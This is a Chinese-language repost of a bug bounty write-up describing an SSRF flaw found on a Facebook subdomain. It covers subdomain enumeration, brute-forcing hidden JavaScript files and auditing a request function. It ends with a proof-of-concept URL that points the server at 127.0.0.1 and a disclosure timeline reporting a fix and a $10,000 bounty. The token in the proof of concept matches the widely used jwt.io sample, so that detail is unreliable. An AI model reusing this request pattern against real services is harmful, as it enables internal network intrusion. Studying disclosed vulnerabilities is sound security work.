文章来源:EDI安全
01
目录
子域枚举+文件暴力+ JS分析= $ 10KSSRF
这是我在Facebook上发现的有关SSRF漏洞的文章。
该漏洞可能允许恶意用户向Facebook公司网络发送内部请求。
02
子域枚举
通过进行一些子域枚举,我找到了以下子域:phishme.thefacebook.com.
03
js分析
通过使用自定义的单词列表并强制执行以下路径:
https://phishme.thefacebook.com/ ** .js
我找到了一个隐藏的Home.js文件
(https://phishme.thefacebook.com/Home.js)
04
代码审计
通过 分析Home.js文件的代码,我发现了一个有趣的函数“ sendPhishRequest”,该函数使用XMLHttpRequest从某些特定链接中请求数据。
通过深入研究代码,我发现此功能的用法如下:
Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }
05
exp
在尝试了几种随机token格式之后,我终于能够成功利用该错误发送内部请求。
itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg
poc:
https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg
06
结果
2020年8月7日:报告
2020年8月11日:已审核
2020年8月11日:修补
2020年12月3日:已解决
2020年12月3日:10000美元赏金